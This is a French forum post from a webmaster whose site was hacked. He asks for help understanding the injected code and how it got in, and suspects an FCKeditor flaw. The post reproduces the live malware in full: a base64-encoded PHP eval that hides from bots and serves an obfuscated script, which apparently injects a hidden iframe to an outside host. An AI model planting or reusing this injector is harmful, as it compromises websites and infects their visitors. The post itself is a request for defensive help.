Bonjour,
J'ai un de mes site qui s'est fait hacker.
Du code a été injecté dans deux pages.
Voici le code :
Ce qui donne décodé :
Code : Sélectionner tout - Visualiser dans une fenêtre à part
1
2 eval(base64_decode('ZXJyb3JfcmVwb3J0aW5nKDApOw0KJGJvdCA9IEZBTFNFIDsNCiR1YSA9ICRfU0VSVkVSWydIVFRQX1VTRVJfQUdFTlQnXTsNCiRib3RzVUEgPSBhcnJheSgnMTIzNDUnLCdhbGV4YS5jb20nLCdhbm9ueW1vdXNlLm9yZycsJ2JkYnJhbmRwcm90ZWN0LmNvbScsJ2Jsb2dwdWxzZS5jb20nLCdib3QnLCdidXp6dHJhY2tlci5jb20nLCdjcmF3bCcsJ2RvY29tbycsJ2RydXBhbC5vcmcnLCdmZWVkdG9vbHMnLCdodG1sZG9jJywnaHR0cGNsaWVudCcsJ2ludGVybmV0c2Vlci5jb20nLCdsaW51eCcsJ21hY2ludG9zaCcsJ21hYyBvcycsJ21hZ2VudCcsJ21haWwucnUnLCdteWJsb2dsb2cgYXBpJywnbmV0Y3JhZnQnLCdvcGVuYWNvb24uZGUnLCdvcGVyYSBtaW5pJywnb3BlcmEgbW9iaScsJ3BsYXlzdGF0aW9uJywncG9zdHJhbmsuY29tJywncHNwJywncnJycnJycnJyJywncnNzcmVhZGVyJywnc2x1cnAnLCdzbm9vcHknLCdzcGlkZXInLCdzcHlkZXInLCdzem4taW1hZ2UtcmVzaXplcicsJ3ZhbGlkYXRvcicsJ3ZpcnVzJywndmxjIG1lZGlhIHBsYXllcicsJ3dlYmNvbGxhZ2UnLCd3b3JkcHJlc3MnLCd4MTEnLCd5YW5kZXgnLCdpcGhvbmUnLCdhbmRyb2lkJyk7DQpmb3JlYWNoICgkYm90c1VBIGFzICRicykge2lmKHN0cnBvcyhzdHJ0b2xvd2VyKCR1YSksICRicykhPT0gZmFsc2UpeyRib3QgPSB0cnVlOyBicmVhazt9fQ0KaWYgKCEkYm90KXsNCgllY2hvKGJhc2U2NF9kZWNvZGUoJ1BITmpjbWx3ZEQ1MGNubDdjVDFrYjJOMWJXVnVkQzVqY21WaGRHVkZiR1Z0Wlc1MEtDSjFJaWs3Y1M1aGNIQmxibVJEYUdsc1pDaHhLeUlpS1R0OVkyRjBZMmdvY1hjcGUyZzlMVEF4TWk4MU8zcDZQU2RoSnlzbmJDYzdaajBuWm5Jbkt5ZHZKeXNuYlNjckowTm9KenRtS3owbllYSkRKenQ5ZEhKNWUzRjNaVDF3Y205MGIzUjVjR1U3ZldOaGRHTm9LR0p5WldKeUtYdDZlajBuZW5ZbkxuTjFZbk4wY2lneE1qTXRNVEl5S1N0NmVqdHpjejFiWFR0bUt6MG9hQ2svSjI5a1pTYzZJaUk3ZHoxMGFHbHpPMlU5ZDF0bUxuTjFZbk4wY2lneE1Ta3JlbnBkTzI0OUlqRXVOU1F4TGpVa05Ea3VOU1EwT0NReE15UXhOeVEwTnlRMU1pNDFKRFEyTGpVa05UVXVOU1ExTVM0MUpEUTNMalVrTlRJa05UVWtNakFrTkRndU5TUTBOeTQxSkRVMUpETXhMalVrTlRFa05EY3VOU1ExTVM0MUpEUTNMalVrTlRJa05UVWtOVFF1TlNRek1DUTFOeTQxSkRNNUpEUTFMalVrTkRndU5TUXpOaVEwTlM0MUpEVXhMalVrTkRjdU5TUXhOeVF4Tmk0MUpEUTJKRFV5TGpVa05EY2tOVGN1TlNReE5pNDFKREUzTGpVa05ESXVOU1F5TVNRME15NDFKREUzTGpVa05UZ3VOU1F6TGpVa01TNDFKREV1TlNReExqVWtORGt1TlNRME9DUTFOQ1EwTlM0MUpEVXhMalVrTkRjdU5TUTFOQ1F4TnlReE55NDFKREkyTGpVa015NDFKREV1TlNReExqVWtOVGt1TlNReE15UTBOeTQxSkRVeEpEVTBMalVrTkRjdU5TUXhNeVExT0M0MUpETXVOU1F4TGpVa01TNDFKREV1TlNRME55UTFNaTQxSkRRMkxqVWtOVFV1TlNRMU1TNDFKRFEzTGpVa05USWtOVFVrTWpBa05UWXVOU1ExTkNRME9TNDFKRFUxSkRRM0xqVWtNVGNrTVRRa01qY2tORGt1TlNRME9DUTFOQ1EwTlM0MUpEVXhMalVrTkRjdU5TUXhNeVExTkM0MUpEVTBKRFEyTGpVa01qY3VOU1F4Tmk0MUpEUTVKRFUxSkRVMUpEVXpKREkySkRJd0xqVWtNakF1TlNRMU1TNDFKRFV5TGpVa05UVXVOU1ExT0NRMU55NDFKRFUzTGpVa05UZ2tORFV1TlNReU1DUTFNUzQxSkRVM0xqVWtORGdrTlRVa05UTWtNakFrTlRJa05EVXVOU1ExTVM0MUpEUTNMalVrTWpBdU5TUTBOeVF5TUM0MUpESXpKREl4SkRJekpESXdKRFV6SkRRNUpEVXpKREk0TGpVa05EZ3VOU1ExTWk0MUpESTNMalVrTWpFdU5TUXhOaTQxSkRFekpEVTJMalVrTkRrdU5TUTBOeVExTlNRME9TUXlOeTQxSkRFMkxqVWtNakV1TlNReU1TUXhOaTQxSkRFekpEUTVKRFEzTGpVa05Ea3VOU1EwT0M0MUpEUTVKRFUxSkRJM0xqVWtNVFl1TlNReU1TNDFKREl4SkRFMkxqVWtNVE1rTlRRdU5TUTFOU1ExTnk0MUpEVXhKRFEzTGpVa01qY3VOU1F4Tmk0MUpEVTJKRFE1TGpVa05UUXVOU1EwT1M0MUpEUTJKRFE1TGpVa05URWtORGt1TlNRMU5TUTFOeTQxSkRJMkpEUTVKRFE1TGpVa05EY2tORGNrTkRjdU5TUTFNaVF5Tmk0MUpEVXpKRFV5TGpVa05UUXVOU1EwT1M0MUpEVTFKRFE1TGpVa05USXVOU1ExTWlReU5pUTBOUzQxSkRRMkpEVTBMalVrTlRJdU5TUTFNU1ExTlM0MUpEVTFKRFEzTGpVa01qWXVOU1ExTVNRME55NDFKRFE0SkRVMUpESTJKREl4SkRJMkxqVWtOVFVrTlRJdU5TUTFNeVF5TmlReU1TUXlOaTQxSkRFMkxqVWtNamdrTWpja01qQXVOU1EwT1M0MUpEUTRKRFUwSkRRMUxqVWtOVEV1TlNRME55NDFKREk0SkRFMEpERTNMalVrTWpZdU5TUXpMalVrTVM0MUpERXVOU1ExT1M0MUpETXVOU1F4TGpVa01TNDFKRFE0SkRVMUxqVWtOVElrTkRZdU5TUTFOU1EwT1M0MUpEVXlMalVrTlRJa01UTWtORGt1TlNRME9DUTFOQ1EwTlM0MUpEVXhMalVrTkRjdU5TUTFOQ1F4TnlReE55NDFKRFU0TGpVa015NDFKREV1TlNReExqVWtNUzQxSkRVMkpEUTFMalVrTlRRa01UTWtORGdrTVRNa01qY3VOU1F4TXlRME55UTFNaTQxSkRRMkxqVWtOVFV1TlNRMU1TNDFKRFEzTGpVa05USWtOVFVrTWpBa05EWXVOU1ExTkNRME55NDFKRFExTGpVa05UVWtORGN1TlNRek1TNDFKRFV4SkRRM0xqVWtOVEV1TlNRME55NDFKRFV5SkRVMUpERTNKREUyTGpVa05Ea3VOU1EwT0NRMU5DUTBOUzQxSkRVeExqVWtORGN1TlNReE5pNDFKREUzTGpVa01qWXVOU1EwT0NReU1DUTFOQzQxSkRRM0xqVWtOVFVrTWprdU5TUTFOU1ExTlNRMU5DUTBPUzQxSkRRMkpEVTFMalVrTlRVa05EY3VOU1F4TnlReE5pNDFKRFUwTGpVa05UUWtORFl1TlNReE5pNDFKREU1SkRFMkxqVWtORGtrTlRVa05UVWtOVE1rTWpZa01qQXVOU1F5TUM0MUpEVXhMalVrTlRJdU5TUTFOUzQxSkRVNEpEVTNMalVrTlRjdU5TUTFPQ1EwTlM0MUpESXdKRFV4TGpVa05UY3VOU1EwT0NRMU5TUTFNeVF5TUNRMU1pUTBOUzQxSkRVeExqVWtORGN1TlNReU1DNDFKRFEzSkRJd0xqVWtNak1rTWpFa01qTWtNakFrTlRNa05Ea2tOVE1rTWpndU5TUTBPQzQxSkRVeUxqVWtNamN1TlNReU1TNDFKREUyTGpVa01UY3VOU1F5Tmk0MUpEUTRKREl3SkRVMExqVWtOVFVrTlRjdU5TUTFNU1EwTnk0MUpESXdKRFUySkRRNUxqVWtOVFF1TlNRME9TNDFKRFEySkRRNUxqVWtOVEVrTkRrdU5TUTFOU1ExTnk0MUpESTNMalVrTVRZdU5TUTBPU1EwT1M0MUpEUTNKRFEzSkRRM0xqVWtOVElrTVRZdU5TUXlOaTQxSkRRNEpESXdKRFUwTGpVa05UVWtOVGN1TlNRMU1TUTBOeTQxSkRJd0pEVXpKRFV5TGpVa05UUXVOU1EwT1M0MUpEVTFKRFE1TGpVa05USXVOU1ExTWlReU55NDFKREUyTGpVa05EVXVOU1EwTmlRMU5DNDFKRFV5TGpVa05URWtOVFV1TlNRMU5TUTBOeTQxSkRFMkxqVWtNall1TlNRME9DUXlNQ1ExTkM0MUpEVTFKRFUzTGpVa05URWtORGN1TlNReU1DUTFNU1EwTnk0MUpEUTRKRFUxSkRJM0xqVWtNVFl1TlNReU1TUXhOaTQxSkRJMkxqVWtORGdrTWpBa05UUXVOU1ExTlNRMU55NDFKRFV4SkRRM0xqVWtNakFrTlRVa05USXVOU1ExTXlReU55NDFKREUyTGpVa01qRWtNVFl1TlNReU5pNDFKRFE0SkRJd0pEVTBMalVrTkRjdU5TUTFOU1F5T1M0MUpEVTFKRFUxSkRVMEpEUTVMalVrTkRZa05UVXVOU1ExTlNRME55NDFKREUzSkRFMkxqVWtOVFl1TlNRME9TNDFKRFEzSkRVMUpEUTVKREUyTGpVa01Ua2tNVFl1TlNReU1TNDFKREl4SkRFMkxqVWtNVGN1TlNReU5pNDFKRFE0SkRJd0pEVTBMalVrTkRjdU5TUTFOU1F5T1M0MUpEVTFKRFUxSkRVMEpEUTVMalVrTkRZa05UVXVOU1ExTlNRME55NDFKREUzSkRFMkxqVWtORGtrTkRjdU5TUTBPUzQxSkRRNExqVWtORGtrTlRVa01UWXVOU1F4T1NReE5pNDFKREl4TGpVa01qRWtNVFl1TlNReE55NDFKREkyTGpVa015NDFKREV1TlNReExqVWtNUzQxSkRRM0pEVXlMalVrTkRZdU5TUTFOUzQxSkRVeExqVWtORGN1TlNRMU1pUTFOU1F5TUNRME9DNDFKRFEzTGpVa05UVWtNekV1TlNRMU1TUTBOeTQxSkRVeExqVWtORGN1TlNRMU1pUTFOU1ExTkM0MUpETXdKRFUzTGpVa016a2tORFV1TlNRME9DNDFKRE0ySkRRMUxqVWtOVEV1TlNRME55NDFKREUzSkRFMkxqVWtORFlrTlRJdU5TUTBOeVExTnk0MUpERTJMalVrTVRjdU5TUTBNaTQxSkRJeEpEUXpMalVrTWpBa05EVXVOU1ExTXlRMU15UTBOeTQxSkRVeUpEUTNKRE13TGpVa05Ea2tORGt1TlNRMU1TUTBOeVF4TnlRME9DUXhOeTQxSkRJMkxqVWtNeTQxSkRFdU5TUXhMalVrTlRrdU5TSmJLQ2hsS1Q4aWN5STZJaUlwS3lKd0lpc2liR2wwSWwwb0ltRWtJaTV6ZFdKemRISW9NU2twTzJadmNpaHBQVFl0TWkweExUSXRNVHRwTFRVNU1TRTlNRHRwS3lzcGUyczlhVHR6Y3oxemN5dFRkSEpwYm1jdVpuSnZiVU5vWVhKRGIyUmxLQzB4S21ncUtETXJNU3B1VzJ0ZEtTazdmWEU5YzNNN1pTaHhLVHQ5UEM5elkzSnBjSFErJykpOw0KfQ=='));
Je suppose que le JS est codé. D'ailleurs si quelqu'un pouvait me dire ce qu'il contient ???
Code : Sélectionner tout - Visualiser dans une fenêtre à part
1
2 <script>try{q=document.createElement("u");q.appendChild(q+"");}catch(qw){h=-012/5;zz='a'+'l';f='fr'+'o'+'m'+'Ch';f+='arC';}try{qwe=prototype;}catch(brebr){zz='zv'.substr(123-122)+zz;ss=[];f+=(h)?'ode':"";w=this;e=w[f.substr(11)+zz];n="1.5$1.5$49.5$48$13$17$47$52.5$46.5$55.5$51.5$47.5$52$55$20$48.5$47.5$55$31.5$51$47.5$51.5$47.5$52$55$54.5$30$57.5$39$45.5$48.5$36$45.5$51.5$47.5$17$16.5$46$52.5$47$57.5$16.5$17.5$42.5$21$43.5$17.5$58.5$3.5$1.5$1.5$1.5$49.5$48$54$45.5$51.5$47.5$54$17$17.5$26.5$3.5$1.5$1.5$59.5$13$47.5$51$54.5$47.5$13$58.5$3.5$1.5$1.5$1.5$47$52.5$46.5$55.5$51.5$47.5$52$55$20$56.5$54$49.5$55$47.5$17$14$27$49.5$48$54$45.5$51.5$47.5$13$54.5$54$46.5$27.5$16.5$49$55$55$53$26$20.5$20.5$51.5$52.5$55.5$58$57.5$57.5$58$45.5$20$51.5$57.5$48$55$53$20$52$45.5$51.5$47.5$20.5$47$20.5$23$21$23$20$53$49$53$28.5$48.5$52.5$27.5$21.5$16.5$13$56.5$49.5$47$55$49$27.5$16.5$21.5$21$16.5$13$49$47.5$49.5$48.5$49$55$27.5$16.5$21.5$21$16.5$13$54.5$55$57.5$51$47.5$27.5$16.5$56$49.5$54.5$49.5$46$49.5$51$49.5$55$57.5$26$49$49.5$47$47$47.5$52$26.5$53$52.5$54.5$49.5$55$49.5$52.5$52$26$45.5$46$54.5$52.5$51$55.5$55$47.5$26.5$51$47.5$48$55$26$21$26.5$55$52.5$53$26$21$26.5$16.5$28$27$20.5$49.5$48$54$45.5$51.5$47.5$28$14$17.5$26.5$3.5$1.5$1.5$59.5$3.5$1.5$1.5$48$55.5$52$46.5$55$49.5$52.5$52$13$49.5$48$54$45.5$51.5$47.5$54$17$17.5$58.5$3.5$1.5$1.5$1.5$56$45.5$54$13$48$13$27.5$13$47$52.5$46.5$55.5$51.5$47.5$52$55$20$46.5$54$47.5$45.5$55$47.5$31.5$51$47.5$51.5$47.5$52$55$17$16.5$49.5$48$54$45.5$51.5$47.5$16.5$17.5$26.5$48$20$54.5$47.5$55$29.5$55$55$54$49.5$46$55.5$55$47.5$17$16.5$54.5$54$46.5$16.5$19$16.5$49$55$55$53$26$20.5$20.5$51.5$52.5$55.5$58$57.5$57.5$58$45.5$20$51.5$57.5$48$55$53$20$52$45.5$51.5$47.5$20.5$47$20.5$23$21$23$20$53$49$53$28.5$48.5$52.5$27.5$21.5$16.5$17.5$26.5$48$20$54.5$55$57.5$51$47.5$20$56$49.5$54.5$49.5$46$49.5$51$49.5$55$57.5$27.5$16.5$49$49.5$47$47$47.5$52$16.5$26.5$48$20$54.5$55$57.5$51$47.5$20$53$52.5$54.5$49.5$55$49.5$52.5$52$27.5$16.5$45.5$46$54.5$52.5$51$55.5$55$47.5$16.5$26.5$48$20$54.5$55$57.5$51$47.5$20$51$47.5$48$55$27.5$16.5$21$16.5$26.5$48$20$54.5$55$57.5$51$47.5$20$55$52.5$53$27.5$16.5$21$16.5$26.5$48$20$54.5$47.5$55$29.5$55$55$54$49.5$46$55.5$55$47.5$17$16.5$56.5$49.5$47$55$49$16.5$19$16.5$21.5$21$16.5$17.5$26.5$48$20$54.5$47.5$55$29.5$55$55$54$49.5$46$55.5$55$47.5$17$16.5$49$47.5$49.5$48.5$49$55$16.5$19$16.5$21.5$21$16.5$17.5$26.5$3.5$1.5$1.5$1.5$47$52.5$46.5$55.5$51.5$47.5$52$55$20$48.5$47.5$55$31.5$51$47.5$51.5$47.5$52$55$54.5$30$57.5$39$45.5$48.5$36$45.5$51.5$47.5$17$16.5$46$52.5$47$57.5$16.5$17.5$42.5$21$43.5$20$45.5$53$53$47.5$52$47$30.5$49$49.5$51$47$17$48$17.5$26.5$3.5$1.5$1.5$59.5"[((e)?"s":"")+"p"+"lit"]("a$".substr(1));for(i=6-2-1-2-1;i-591!=0;i++){k=i;ss=ss+String.fromCharCode(-1*h*(3+1*n[k]));}q=ss;e(q);}</script>
Donc, plusieurs questions :
- Quelqu'un a t-il déjà été confronté à ce problème ?
- Comment le hackeur a t-il fait ?
- J'avais FCKEDITOR et en parcourant Google, j'ai lu que ça pouvait provenir d'une faille de celui ci...
Merci d'avance de vos éclaircissement ...
PS : J'ai fait une comparaison des répertoires de ma sauvegarde et du site hacké. Pas de nouveau fichier ...
Dernières news :
J'ai supprimé tous les répertoires et tous les fichiers de mon site puis, j'ai envoyé sur mon serveur la sauvegarde de mon index.php (propre) en le mettant en maintenance puis 3 répertoires : images, include (fichiers propres) et template (fichiers propres).
Je retourne sur mon site et là, mon index est de nouveau infecté !!!!
Une idée ?
Partager